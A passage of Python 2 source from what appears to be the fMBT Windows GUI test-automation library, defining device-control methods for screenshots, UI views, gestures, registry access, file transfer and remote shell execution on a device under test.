"""
Returns Windows error reporting (WER) settings in a dictionary
See also: setErrorReporting()
MSDN WER Settings.
"""
supported_settings = ["DisableArchive",
"Disabled",
"DisableQueue",
"DontShowUI",
"DontSendAdditionalData",
"LoggingDisabled",
"MaxArchiveCount",
"MaxQueueCount"]
settings = {}
for setting in supported_settings:
settings[setting] = self.getRegistry(
r"HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting",
setting)[0]
return settings
def existingView(self):
if self._lastView:
return self._lastView
else:
raise FMBTWindowsError("view is not available. Missing refreshView()?")
def fileProperties(self, filepath):
"""
Returns file properties as a dictionary.
Parameters:
filepath (string):
full path to the file.
"""
escapedFilename = filepath.replace('/', '\\').replace('\\', r'\\\\')
return self.existingConnection().evalPython(
'''wmicGet("datafile",'''
'''componentArgs=("where", "name='%s'"))''' %
escapedFilename)
def getFile(self, remoteFilename, localFilename=None, compress=False):
"""
Fetch file from the device.
Parameters:
remoteFilename (string):
file to be fetched on device
localFilename (optional, string or None):
file to be saved to local filesystem. If None,
return contents of the file without saving them.
compress (optional, boolean or integer):
if True, file contents will be compressed for the transfer.
Integer (0-9) defines compression level. The default is
False: transfer without compression.
"""
return self._conn.recvFile(remoteFilename, localFilename, compress)
def getMatchingPaths(self, pathnamePattern):
"""
Returns list of paths matching pathnamePattern on the device.
Parameters:
pathnamePattern (string):
Pattern for matching files and directories on the device.
Example:
getMatchingPaths("c:/windows/*.ini")
Implementation runs glob.glob(pathnamePattern) on remote device.
"""
return self._conn.recvMatchingPaths(pathnamePattern)
def getClipboard(self):
"""
Returns clipboard contents in text format.
See also: setClipboard()
"""
return self.existingConnection().evalPython("getClipboardText()")
def itemOnScreen(self, guiItem, relation="touch", topWindowBbox=None):
"""
Returns True if bbox of guiItem is non-empty and on the screen
Parameters:
relation (string, optional):
One of the following:
- "overlap": item intersects the screen and the window.
- "touch": mid point (the default touch point) of the item
is within the screen and the window.
- "within": the screen and the window includes the item.
The default is "touch".
"""
if guiItem.properties().get("IsOffscreen", False) == "True":
return False
if relation == "touch":
x1, y1, x2, y2 = guiItem.bbox()
if x1 == x2 or y1 == y2:
return False # a dimension is missing => empty item
itemBox = (guiItem.coords()[0], guiItem.coords()[1],
guiItem.coords()[0] + 1, guiItem.coords()[1] + 1)
partial = True
elif relation == "overlap":
itemBox = guiItem.bbox()
partial = True
elif relation == "within":
itemBox = guiItem.bbox()
partial = False
else:
raise ValueError('invalid itemOnScreen relation: "%s"' % (relation,))
maxX, maxY = self.screenSize()
if topWindowBbox == None:
try:
topWindowBbox = self.topWindowProperties()['bbox']
except TypeError:
topWindowBbox = (0, 0, maxX, maxY)
return (fmbtgti._boxOnRegion(itemBox, (0, 0, maxX, maxY), partial=partial) and
fmbtgti._boxOnRegion(itemBox, topWindowBbox, partial=partial))
def kill(self, pid):
"""
Terminate process
Parameters:
pid (integer):
ID of the process to be terminated.
"""
try:
return self.existingConnection().evalPython(
"kill(%s)" % (repr(pid),))
except:
return False
def keyNames(self):
"""
Returns list of key names recognized by pressKey
"""
return sorted(_g_keyNames)
def osProperties(self):
"""
Returns OS properties as a dictionary
"""
return self.existingConnection().evalPython(
"wmicGet('os')")
def pinch(self, (x, y), startDistance, endDistance,
finger1Dir=90, finger2Dir=270, movePoints=20,
duration=0.75):
"""
Pinch (open or close) on coordinates (x, y).
Parameters:
x, y (integer):
the central point of the gesture. Values in range
[0.0, 1.0] are scaled to full screen width and
height.
startDistance, endDistance (float):
distance from both finger tips to the central point
of the gesture, at the start and at the end of the
gesture. Values in range [0.0, 1.0] are scaled up to
the distance from the coordinates to the edge of the
screen. Both finger tips will reach an edge if
distance is 1.0.
finger1Dir, finger2Dir (integer, optional):
directions for finger tip movements, in range [0,
360]. 0 is to the east, 90 to the north, etc. The
defaults are 90 and 270.
movePoints (integer, optional):
number of points to which finger tips are moved
after laying them to the initial positions. The
default is 20.
duration (float, optional):
duration of the gesture in seconds, the default is 0.75.
"""
screenWidth, screenHeight = self.screenSize()
screenDiagonal = math.sqrt(screenWidth**2 + screenHeight**2)
if x == None: x = 0.5
if y == None: y = 0.5
x, y = self.intCoords((x, y))
if type(startDistance) == float and 0.0 <= startDistance <= 1.0:
startDistanceInPixels = (
startDistance *
min(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
else:
startDistanceInPixels = int(startDistance)
if type(endDistance) == float and 0.0 <= endDistance <= 1.0:
endDistanceInPixels = (
endDistance *
min(fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger1Dir),
fmbtgti._edgeDistanceInDirection((x, y), self.screenSize(), finger2Dir)))
else:
endDistanceInPixels = int(endDistance)
finger1startX = int(x + math.cos(math.radians(finger1Dir)) * startDistanceInPixels)
finger1startY = int(y - math.sin(math.radians(finger1Dir)) * startDistanceInPixels)
finger1endX = int(x + math.cos(math.radians(finger1Dir)) * endDistanceInPixels)
finger1endY = int(y - math.sin(math.radians(finger1Dir)) * endDistanceInPixels)
finger2startX = int(x + math.cos(math.radians(finger2Dir)) * startDistanceInPixels)
finger2startY = int(y - math.sin(math.radians(finger2Dir)) * startDistanceInPixels)
finger2endX = int(x + math.cos(math.radians(finger2Dir)) * endDistanceInPixels)
finger2endY = int(y - math.sin(math.radians(finger2Dir)) * endDistanceInPixels)
self.existingConnection().sendPinch(
(finger1startX, finger1startY), (finger1endX, finger1endY),
(finger2startX, finger2startY), (finger2endX, finger2endY),
movePoints, duration)
return True
def pinchOpen(self, (x, y) = (0.5, 0.5), startDistance=0.1, endDistance=0.5, **pinchKwArgs):
"""
Make the open pinch gesture.
Parameters:
x, y (integer, optional):
the central point of the gesture, the default is in
the middle of the screen.
startDistance, endDistance (float, optional):
refer to pinch documentation. The default is 0.1 and
0.5.
for the rest of the parameters, refer to pinch documentation.
"""
return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
def pinchClose(self, (x, y) = (0.5, 0.5), startDistance=0.5, endDistance=0.1, **pinchKwArgs):
"""
Make the close pinch gesture.
Parameters:
x, y (integer, optional):
the central point of the gesture, the default is in
the middle of the screen.
startDistance, endDistance (float, optional):
refer to pinch documentation. The default is 0.5 and
0.1.
rest of the parameters: refer to pinch documentation.
"""
return self.pinch((x, y), startDistance, endDistance, **pinchKwArgs)
def putFile(self, localFilename, remoteFilepath, data=None):
"""
Send local file to the device.
Parameters:
localFilename (string):
file to be sent.
remoteFilepath (string):
destination on the device. If destination is an
existing directory, the file will be saved to the
directory with its original local name. Otherwise the file
will be saved with remoteFilepath as new name.
data (string, optional):
data to be stored to remoteFilepath. The default is
the data in the local file.
Example: Copy local /tmp/file.txt to c:/temp
putFile("/tmp/file.txt", "c:/temp/")
Example: Create new remote file
putFile(None, "c:/temp/file.txt", "remote file contents")
"""
return self._conn.sendFile(localFilename, remoteFilepath, data)
def rmFile(self, remoteFilepath):
"""
Remove a file from the device.
Parameters:
remoteFilepath (string):
file to be removed from the device.
"""
return self.existingConnection().evalPython(
"os.remove(%s)" % (repr(remoteFilepath),))
def reconnect(self, connspec=None, password=None):
"""
Close connections to the device and reconnect.
Parameters:
connspec (string, optional):
Specification for new connection. The default is current
connspec.
password (string, optional):
Password for new connection. The default is current password.
"""
self.setConnection(None)
import gc
gc.collect()
if connspec != None:
self._connspec = connspec
if password != None:
self._password = password
if self._connspec == None:
_adapterLog("reconnect failed: missing connspec")
return False
try:
self.setConnection(WindowsConnection(
self._connspec, self._password))
return True
except Exception, e:
_adapterLog("reconnect failed: %s" % (e,))
return False
def refreshView(self, window=None, forcedView=None, viewSource=None,
items=None, properties=None, area=None):
"""
(Re)reads widgets on the top window and updates the latest view.
Parameters:
window (integer (hWnd) or string (title), optional):
read widgets from given window instead of the top window.
forcedView (View or filename, optional):
use given View object or view file instead of reading the
items from the device.
viewSource (string, optional):
source of UI information. Supported sources are:
"uiautomation" the UIAutomation framework.
"enumchildwindows" less data
but does not require UIAutomation.
The default is "uiautomation".
You can define TreeWalker used by "uiautomation" by defining
viewSource as "uiautomation/raw", "uiautomation/control" or
"uiautomation/content".
See also setViewSource().
items (list of view items, optional):
update only contents of these items in the view.
Works only for "uiautomation" view source.
properties (list of property names, optional):
read only given properties from items, the default
is to read all available properties.
Works only for "uiautomation" view source.
See also setViewSource().
area ((left, top, right, bottom), optional):
refresh only items that intersect the area.
The default is None: locations do not affect refreshed
items.
See also setRefreshViewDefaults().
Returns View object.
"""
if window == None:
window = self._refreshViewDefaults.get("window", None)
if forcedView == None:
forcedView = self._refreshViewDefaults.get("forcedView", None)
if viewSource == None:
viewSource = self.viewSource()
if not viewSource in _g_viewSources:
raise ValueError('invalid view source "%s"' % (viewSource,))
if items == None:
items = self._refreshViewDefaults.get("items", [])
if properties == None:
properties = self._refreshViewDefaults.get("properties", None)
if area == None:
area = self._refreshViewDefaults.get("area", None)
if forcedView != None:
retryCount = 0
startTime = time.time()
lastStartTime = startTime
viewFilename = forcedView
if isinstance(forcedView, View):
self._lastView = forcedView
elif type(forcedView) in [str, unicode]:
try:
self._lastView = View(forcedView, ast.literal_eval(file(viewFilename).read()))
except Exception:
self._lastView = None
endTime = time.time()
else:
if self.screenshotDir() == None:
self.setScreenshotDir(self._screenshotDirDefault)
if self.screenshotSubdir() == None:
self.setScreenshotSubdir(self._screenshotSubdirDefault)
viewFilename = self._newScreenshotFilepath()[:-3] + "view"
retryCount = 0
startTime = time.time()
lastStartTime = startTime
while True:
try:
topWindowBbox = self.topWindowProperties()['bbox']
except TypeError:
topWindowBbox = None # top window unavailable
if area:
leftTopRightBottom = (
self.intCoords((area[0], area[1])) +
self.intCoords((area[2], area[3])))
else:
leftTopRightBottom = None
if viewSource == "enumchildwindows":
viewData = self._conn.recvViewData(window)
else:
if "/" in viewSource:
walker = viewSource.split("/")[1]
else:
walker = "raw"
if properties != None:
if properties == "all":
viewItemProperties = None
elif properties == "fast":
viewItemProperties = ["AutomationId",
"BoundingRectangle",
"ClassName",
"HelpText",
"ToggleState",
"Value",
"Minimum",
"Maximum",
"Name"]
elif isinstance(properties, list) or isinstance(properties, tuple):
viewItemProperties = list(properties)
else:
raise ValueError('invalid properties argument, expected "all", '
'"fast" or a list')
else:
viewItemProperties = properties
viewData = self._conn.recvViewUIAutomation(
window, items, viewItemProperties, leftTopRightBottom, walker)
file(viewFilename, "w").write(repr(viewData))
try:
self._lastView = View(
viewFilename, viewData,
itemOnScreen=lambda i: self.itemOnScreen(i, topWindowBbox=topWindowBbox))
break
except Exception, e:
self._lastView = None
_adapterLog(
"refreshView %s failed (%s), source=%s topWindow=%s" %
(retryCount, e, repr(viewSource), self.topWindow()))
retryCount += 1
if retryCount < self._refreshViewRetryLimit:
time.sleep(0.2)
else:
break
lastStartTime = time.time()
endTime = time.time()
itemCount = -1
if self._lastView:
itemCount = len(self._lastView._viewItems)
self._lastViewStats = {
"retries": retryCount,
"timestamp": endTime,
"total time": endTime - startTime,
"last time": endTime - lastStartTime,
"filename": viewFilename,
"source": viewSource,
"forced": (forcedView != None),
"window": window,
"view": str(self._lastView),
"item count": itemCount}
return self._lastView
def refreshViewDefaults(self):
"""Returns default arguments for refreshView() calls.
See also setRefreshViewDefaults().
"""
return dict(self._refreshViewDefaults)
def setClipboard(self, data):
"""
Set text on clipboard
Parameters:
data (string):
data to be set on the clipboard.
Note: any type of data on clipboard will be emptied.
See also: getClipboard()
"""
return self.existingConnection().evalPython(
"setClipboardText(%s)" % (repr(data),))
def setErrorReporting(self, settings):
"""
Modify Windows error reporting settings (WER)
Parameters:
settings (dictionary):
WER settings and values to be set.
Example: disable showing interactive crash dialogs
setErrorReporting({"DontShowUI": 1})
See also: errorReporting(),
MSDN WER Settings.
"""
for setting in settings:
self.setRegistry(
r"HKEY_CURRENT_USER\Software\Microsoft\Windows\Windows Error Reporting",
setting, settings[setting])
return True
def setDisplaySize(self, size):
"""
Transform coordinates of synthesized events (like a tap) from
screenshot resolution to display input area size. By default
events are synthesized directly to screenshot coordinates.
Parameters:
size (pair of integers: (width, height)):
width and height of display in pixels. If not given,
values from EnumDisplayMonitors are used.
Returns None.
"""
width, height = size
screenWidth, screenHeight = self.screenSize()
self._conn.setScreenToDisplayCoords(
lambda x, y: (x * width / screenWidth,
y * height / screenHeight))
self._conn.setDisplayToScreenCoords(
lambda x, y: (x * screenWidth / width,
y * screenHeight / height))
def setForegroundWindow(self, window):
"""
Set a window with the title as a foreground window
Parameters:
window (title (string) or hwnd (integer):
title or handle of the window to be raised
foreground.
Returns True if the window was brought to the foreground,
otherwise False.
Notes: calls SetForegroundWindow in user32.dll.
"""
return self.existingConnection().sendSetForegroundWindow(window)
def setRefreshViewDefaults(self, **kwargs):
"""Set new default arguments for refreshView() calls
Parameters:
**kwargs (keyword arguments)
new default values for optional refreshView() parameters.
Note: default arguments are overridden by arguments given
directly in refreshView calls.
Note: setViewSource() can change the default arguments.
Example:
setRefreshViewDefaults(window="My app title",
viewSource="uiautomation/content")
"""
self._refreshViewDefaults = kwargs
def findRegistry(self, rootKey, key=None, valueName=None, limit=1):
"""Search for key and/or valueName from the registry.
Returns a list of matching (fullKeyPath, valueName) pairs
found under the rootKey. The list has at most limit items, the
default is 1.
Parameters:
rootKey (string):
root key path for the search. Example:
"HKEY_LOCAL_MACHINE".
key (string, optional):
key name to be searched for under the rootKey.
The key is a regular expression that is searched for
from full key path. Use "\\name$" to require exact
match.
If not given, valueName should be defined.
valueName (string, optional):
value name to be searched for under the rootKey.
The value can be a regular expression.
If not given, key should be defined and
returned valueName will be None.
limit (integer, optional):
maximum number of matches to be returned. The
default is 1. limit=None returns all matching
pairs.
Example:
findRegistry("HKEY_LOCAL_MACHINE", key="\\Windows$")
"""
if key == None and valueName == None:
raise ValueError("either key or valueName must be provided")
return self.existingConnection().evalPython(
'findRegistry(%s, key=%s, valueName=%s, limit=%s)' % (
repr(rootKey), repr(key), repr(valueName), repr(limit)))
def setRegistry(self, key, valueName, value, valueType=None):
"""
Set Windows registry value.
Parameters:
key (string):
full key name.
valueName (string):
name of the value to be set.
value (string):
string that specifies the new value.
valueType (string, optional for str and int values):
REG_BINARY, REG_DWORD, REG_DWORD_LITTLE_ENDIAN,
REG_DWORD_BIG_ENDIAN, REG_EXPAND_SZ, REG_LINK,
REG_MULTI_SZ, REG_NONE, REG_RESOURCE_LIST or REG_SZ.
Default types for storing str and int values
are REG_SZ and REG_DWORD.
Example:
setRegistry(r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet"
"\Control\Session Manager\Environment",
"PATH", r"C:\MyExecutables", "REG_EXPAND_SZ")
Returns True on success.
"""
return self.existingConnection().evalPython(
"setRegistry(%s,%s,%s,%s)" % (repr(key), repr(valueName),
repr(value), repr(valueType)))
def getRegistry(self, key, valueName):
"""
Return Windows registry value and type
Parameters:
key (string):
full key name.
valueName (string):
name of the value to be read.
Returns a pair (value, valueType)
Example:
getRegistry(r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet"
"\Control\Session Manager\Environment", "PATH")
"""
return self.existingConnection().evalPython(
"getRegistry(%s,%s)" % (repr(key), repr(valueName)))
def processList(self):
"""
Return list of processes running on the device.
Returns list of dictionaries with keys:
"pid": process ID, and
"ProcessImageFileName": full path to the executable in win32 format.
"""
return self.existingConnection().evalPython("processList()")
def processStatus(self, pid):
"""
Return status of a process
Parameters:
pid (integer):
Process ID of the process
Returns properties in a dictionary.
Example:
print "Memory usage:", processStatus(4242)["WorkingSetSize"]
"""
return self.existingConnection().evalPython(
"processStatus(%s)" % (repr(pid),))
def productList(self):
"""
Return list of products installed or advertised in the system
Returns list of dictionaries, each containing properties of a product.
"""
return self.existingConnection().evalPython("products()")
def pycosh(self, command):
"""
Run command in pycosh shell on the device.
Parameters:
command (string):
pycosh command to be executed. Pycosh implements
stripped-down versions of zip, tar, find, md5sum, diff,
grep, head, tail, curl,... the usual handy shell utils.
For information on pycosh commands, try
device.pycosh("help") or run in shell:
echo help | python -m pycosh.
"""
return self.existingConnection().pycosh(command)
def setScreenshotSize(self, size):
"""
Force screenshots from device to use given resolution.
Overrides detected monitor resolution on device.
Parameters:
size (pair of integers: (width, height)):
width and height of screenshot.
"""
self._conn.setScreenshotSize(size)
def setTopWindow(self, window):
"""
Set a window as a foreground window and bring it to front.
Parameters:
window (title (string) or hwnd (integer):
title or handle of the window to be raised
foreground.
Returns True if the window was brought to the foreground,
otherwise False.
Notes: calls SetForegroundWindow in user32.dll.
"""
return self.existingConnection().sendSetTopWindow(window)
def setViewSource(self, source, properties=None):
"""
Set default view source for refreshView()
Parameters:
source (string):
default source, "enumchildwindow" or "uiautomation",
"uiautomation/raw", "uiautomation/control",
"uiautomation/content".
properties (string or list of strings, optional):
set list of view item properties to be read.
"all" reads all available properties for each item.
"fast" reads a set of preselected properties.
list of strings reads properties in the list.
The default is "all".
Returns None.
See also refreshView(), viewSource(), refreshViewDefaults().
"""
if not source in _g_viewSources:
raise ValueError(
'invalid view source "%s", expected one of: "%s"' %
(source, '", "'.join(_g_viewSources)))
if properties != None:
self._refreshViewDefaults["properties"] = properties
self._refreshViewDefaults["viewSource"] = source
def shell(self, command):
"""
Execute command in Windows.
Parameters:
command (string or list of strings):
command to be executed. Will be forwarded directly
to subprocess.check_output. If command is a string,
then it will be executed in subshell, otherwise without
shell.
Returns what is printed by the command.
If you wish to receive exitstatus or standard output and error
separated from command, refer to shellSOE().
"""
return self._conn.evalPython('shell(%s)' % (repr(command),))
def shellSOE(self, command, asyncStatus=None, asyncOut=None, asyncError=None, cwd=None):
"""
Execute command on Windows.
Parameters:
command (string or list of strings):
command to be executed. If command is a list of
string, it will be executed without shell
(subprocess.check_output with shell=False).
If command is a single-line string, it will be
executed in shell (subprocess.check_output with
shell=True).
If command is a multiline string, it will be written
to a BAT file and executed as a script.
asyncStatus (string, True or None)
filename (on device) to which the status of
asynchronously executed shellCommand will be
written. If True, the command will be executed
asynchronously but exit status will not be
saved. The default is None, that is, command will be
run synchronously, and status will be returned in
the tuple.
asyncOut (string, True or None)
filename (on device) to which the standard output of
asynchronously executed shellCommand will be
written. If True, the command will be executed
asynchronously but output will not saved. The
default is None.
asyncError (string, True or None)
filename (on device) to which the standard error of
asynchronously executed shellCommand will be
written. If True, the command will be executed
asynchronously but standard error will not be
saved. The default is None.
cwd (string, optional)
current working directory in which the command
will be executed. If not given, the cwd defaults
to the current working directory of the pythonshare
server process on the device, or the cwd of the Python
process if executed on host without pythonshare-server.
Returns triplet: exit status, standard output and standard error
from the command.
If executing command fails, returns None, None, None.
"""
return self._conn.evalPython(
'shellSOE(%s, asyncStatus=%s, asyncOut=%s, asyncError=%s, cwd=%s)'
% (repr(command),
repr(asyncStatus), repr(asyncOut), repr(asyncError),
repr(cwd)))
def showWindow(self, window, showCmd=SW_NORMAL):
"""
Send showCmd to window.
Parameters:
window (window title (string) or handle (integer)):
window to which the command will be sent.
showCmd (integer or string):
command to be sent. Valid commands are 0..11:
SW_HIDE, SW_NORMAL, SW_MINIMIZED, SW_MAXIMIZE,
SW_NOACTIVATE, SW_SHOW SW_MINIMIZE, SW_MINNOACTIVE,
SW_SHOWNA, SW_RESTORE, SW_DEFAULT, SW_FORCEMINIMIZE.
Returns True if the window was previously visible,
otherwise False.
Notes: calls ShowWindow in user32.dll.
"""
return self.existingConnection().sendShowWindow(window, showCmd)
def tapText(self, text, partial=False, **tapKwArgs):
"""
Find an item with given text from the latest view, and tap it.
Parameters:
partial (boolean, optional):
refer to verifyText documentation. The default is
False.
tapPos (pair of floats (x, y)):
refer to tapItem documentation.
button, long, hold, count, delayBetweenTaps (optional):
refer to tap documentation.
Returns True if successful, otherwise False.
"""
items = self.existingView().findItemsByText(text, partial=partial, count=1, onScreen=True)
if len(items) == 0: return False
return self.tapItem(items[0], **tapKwArgs)
def topWindow(self):
"""
Returns a handle to the window.
"""
return self.existingConnection().evalPython(
"ctypes.windll.user32.GetForegroundWindow()")
def topWindowProperties(self):
"""
Return properties of the top window as a dictionary
"""
return self._conn.recvTopWindowProperties()
def verifyText(self, text, partial=False):
"""
Verify that the last view has at least one item with given
text.
Parameters:
text (string):
text to be searched for in items.
partial (boolean, optional):
if True, match items if item text contains given
text, otherwise match only if item text is equal to
the given text. The default is False (exact match).
"""
assert self._lastView != None, "View required."
return self._lastView.findItemsByText(text, partial=partial, count=1, onScreen=True) != []
def viewSource(self):
"""
Returns current default view source.
See also refreshView(), setViewSource().
"""
return self._refreshViewDefaults.get(
"viewSource", self._defaultViewSource)
def windowList(self):
"""
Return list of properties of windows (dictionaries)
Example: list window handles and titles:
for props in d.windowList():
print props["hwnd"], props["title"]
"""
return self._conn.recvWindowList()
def windowProperties(self, window):
"""
Returns properties of a window.
Parameters:
window (title (string) or hwnd (integer):
The window whose properties will be returned.
Returns properties in a dictionary.
"""
return self.existingConnection().recvWindowProperties(window)
def windowStatus(self, window):
"""
Returns status of a window.
Parameters:
window (title (string) or hwnd (integer):
The window whose properties will be returned.
Returns status in a dictionary.
"""
return self.existingConnection().recvWindowStatus(window)
def view(self):
return self._lastView
def viewStats(self):
return self._lastViewStats
class _NoPythonshareConnection(object):
"""Fake Pythonshare connection, evaluate everything locally"""
def __init__(self, namespace="default"):
self._namespaces = {}
self._ns = namespace
def exec_in(self, ns, code):
if not ns in self._namespaces:
self._namespaces[ns] = {}
exec code in self._namespaces[ns]
def eval_in(self, ns, expr):
if not ns in self._namespaces:
self._namespaces[ns] = {}
return eval(expr, self._namespaces[ns])
def namespace(self):
return self._ns
class WindowsConnection(fmbtgti.GUITestConnection):
def __init__(self, connspec, password):
fmbtgti.GUITestConnection.__init__(self)
self._screenshotSize = (None, None) # autodetect
self._pycosh_sent_to_dut = False
if connspec != None:
self._agent = pythonshare.connect(connspec, password=password)
else:
if os.name != "nt":
raise ValueError("connecting to host works only on Windows")
self._agent = _NoPythonshareConnection()
self._agent_ns = self._agent.namespace()
agentFilename = os.path.join(
os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))),
"fmbtwindows_agent.py")
self._agent.exec_in(self._agent_ns, file(agentFilename).read())
self.setScreenToDisplayCoords(lambda x, y: (x, y))
self.setDisplayToScreenCoords(lambda x, y: (x, y))
def pycosh(self, command):
if not self._pycosh_sent_to_dut:
# upload pycosh module to DUT
self.execPython(file(inspect.getsourcefile(pycosh)).read())
self._pycosh_sent_to_dut = True
return self.evalPython("pycosh_eval(%s)" % (repr(command),))
def setScreenshotSize(self, screenshotSize):
self._screenshotSize = screenshotSize
screenW, screenH = self._screenshotSize
inputW, inputH = self._agent.eval_in(self._agent_ns, "_mouse_input_area")
self.setScreenToDisplayCoords(
lambda x, y: (x * inputW / screenW, y * inputH / screenH))
self.setDisplayToScreenCoords(
lambda x, y: (x * screenW / inputW, y * screenH / inputH))
def execPython(self, code):
return self._agent.exec_in(self._agent_ns, code)
def evalPython(self, code):
return self._agent.eval_in(self._agent_ns, code)
def recvFile(self, remoteFilename, localFilename=None, compress=False):
if compress:
if isinstance(compress, int):
compressLevel = compress
else:
compressLevel = 3
data = self._agent.eval_in(
self._agent_ns,
"zlib.compress(file(%s, 'rb').read(), %s)" % (
repr(remoteFilename), compressLevel))
data = zlib.decompress(data)
else:
data = self._agent.eval_in(
self._agent_ns,
"file(%s, 'rb').read()" % (repr(remoteFilename),))
if localFilename:
file(localFilename, "wb").write(data)
return True
else:
return data
def sendFile(self, localFilename, remoteFilepath, data=None):
if data == None:
data = file(localFilename).read()
if localFilename:
basename = os.path.basename(localFilename)
else:
basename = localFilename
rv = self.evalPython('saveFile(%s, %s, base64.b64decode(%s))' %
(repr(basename),
repr(remoteFilepath),
repr(base64.b64encode(data))))
return rv
def recvMatchingPaths(self, pathnamePattern):
return self._agent.eval_in(self._agent_ns,
"glob.glob(%s)" % (repr(pathnamePattern),))
def recvScreenshot(self, filename, screenshotSize=(None, None)):
ppmfilename = filename + ".ppm"
if screenshotSize == (None, None):
screenshotSize = self._screenshotSize
width, height, zdata = self._agent.eval_in(
self._agent_ns, "screenshotZYBGR(%s)" % (repr(screenshotSize),))
data = zlib.decompress(zdata)
fmbtgti.eye4graphics.wbgr2rgb(data, width, height)
if fmbtpng != None:
file(filename, "wb").write(
fmbtpng.raw2png(data, width, height, 8, "RGB"))
else:
ppm_header = "P6\n%d %d\n%d\n" % (width, height, 255)
f = file(filename + ".ppm", "wb")
f.write(ppm_header)
f.write(data)
f.close()
_run([fmbt_config.imagemagick_convert, ppmfilename, filename], expectedExitStatus=[0])
os.remove(ppmfilename)
return True
def recvTopWindowProperties(self):
return self.evalPython("topWindowProperties()")
def recvWindowProperties(self, window):
hwnd = self._window2hwnd(window)
return self.evalPython("windowProperties(%s)" % (hwnd,))
def recvWindowStatus(self, window):
hwnd = self._window2hwnd(window)
return self.evalPython("windowStatus(%s)" % (hwnd,))
def recvViewData(self, window=None):
rv = None
if window == None:
rv = self.evalPython("topWindowWidgets()")
elif isinstance(window, int):
rv = self.evalPython("windowWidgets(%s)" % (repr(window),))
elif isinstance(window, str) or isinstance(window, unicode):
wlist = self.evalPython("windowList()")
for w in wlist:
if w["title"] == window:
rv = self.evalPython("windowWidgets(%s)" % (repr(w["hwnd"]),))
break
else:
raise ValueError('no window with title "%s"' % (window,))
else:
raise ValueError('illegal window "%s", expected integer or string (hWnd or title)' % (window,))
return rv
def recvViewUIAutomation(self, window=None, items=[], properties=None, area=None, walker="raw"):
"""returns list of dictionaries, each of which contains properties of
an item"""
if not walker in ["raw", "control", "content"]:
raise ValueError('invalid walker %s' % (repr(walker),))
if window != None:
hwnd = self._window2hwnd(window)
else:
hwnd = None
if properties == None:
properties = []
else:
# make sure certain properties are always included
propertySet = set(properties)
for must_be in ["BoundingRectangle"]:
propertySet.add(must_be)
properties = list(propertySet)
dumps = []
if items:
for item in items:
dumps.append(self.evalPython("dumpUIAutomationElements(%s, %s, %s, %s, %s)" % (
repr(hwnd),
repr([str(item.id()) for item in item.branch()]),
repr(properties),
repr(area),
repr(walker))))
else:
dumps.append(self.evalPython("dumpUIAutomationElements(%s, %s, %s, %s, %s)" % (
repr(hwnd),
repr([]),
repr(properties),
repr(area),
repr(walker))))
rv = []
prop_data = {}
for dump in dumps:
for prop_line in dump.splitlines():
if not "=" in prop_line:
continue
prop_name, prop_value = prop_line.split("=", 1)
if prop_name == "hash":
if prop_data:
rv.append(prop_data)
prop_data = {}
prop_data[prop_name] = prop_value.replace(r"\r\n", "\n").replace(r"\\", "\\")
if prop_data:
rv.append(prop_data)
return rv
def recvWindowList(self):
return self.evalPython("windowList()")
def _window2hwnd(self, window):
if isinstance(window, str) or isinstance(window, unicode):
windowList = self.recvWindowList()
hwndList = [w["hwnd"] for w in windowList if w["title"] == window]
if not hwndList:
raise ValueError('no window with title "%s"' % (window,))
hwnd = hwndList[0]
elif isinstance(window, dict) and "hwnd" in window:
hwnd = window["hwnd"]
elif isinstance(window, int) or isinstance(window, long):
hwnd = window
else:
raise ValueError('invalid window "%s", string, integer or dict with "hwnd" key expected' % (window,))
return hwnd
def sendCloseWindow(self, window):
hwnd = self._window2hwnd(window)
return self.evalPython("closeWindow(%s)" % (repr(hwnd),))
def sendSetForegroundWindow(self, window):
hwnd = self._window2hwnd(window)
return 0 != self.evalPython("ctypes.windll.user32.SetForegroundWindow(%s)" %
(repr(hwnd),))
def sendSetTopWindow(self, window):
hwnd = self._window2hwnd(window)
return 0 != self.evalPython("setTopWindow(%s)" %
(repr(hwnd),))
def sendShowWindow(self, window, showCmd):
hwnd = self._window2hwnd(window)
return self.evalPython("showWindow(%s, %s)" % (repr(hwnd), repr(showCmd)))
def sendType(self, text):
command = 'sendType(%s)' % (repr(text),)
self._agent.eval_in(self._agent_ns, command)
return True
def sendPress(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKey("%s",[])' % (keyCode,)
else:
command = 'sendKey("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendKeyDown(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKeyDown("%s",[])' % (keyCode,)
else:
command = 'sendKeyDown("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendKeyUp(self, keyCode, modifiers=None):
if modifiers == None:
command = 'sendKeyUp("%s",[])' % (keyCode,)
else:
command = 'sendKeyUp("%s",%s)' % (keyCode, repr(modifiers))
self._agent.eval_in(self._agent_ns, command)
return True
def sendTap(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTap(%s, %s)" % (x, y)
else:
command = "sendClick(%s, %s, %s)" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchDown(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchDown(%s, %s)" % (x, y)
else:
command = "(sendMouseMove(%s, %s), sendMouseDown(%s))" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchMove(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchMove(%s, %s)" % (x, y)
else:
command = "sendMouseMove(%s, %s, %s)" % (x, y, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendTouchUp(self, x, y, button=None):
x, y = self._screenToDisplay(x, y)
if button == None:
command = "sendTouchUp(%s, %s)" % (x, y)
else:
command = "(sendMouseMove(%s, %s, %s), sendMouseUp(%s))" % (
x, y, button, button)
self._agent.eval_in(self._agent_ns, command)
return True
def sendPinch(self, *args):
self.evalPython("touchPinch%s" % (args,))
return True
def setScreenToDisplayCoords(self, screenToDisplayFunction):
self._screenToDisplay = screenToDisplayFunction
def setDisplayToScreenCoords(self, displayToScreenFunction):
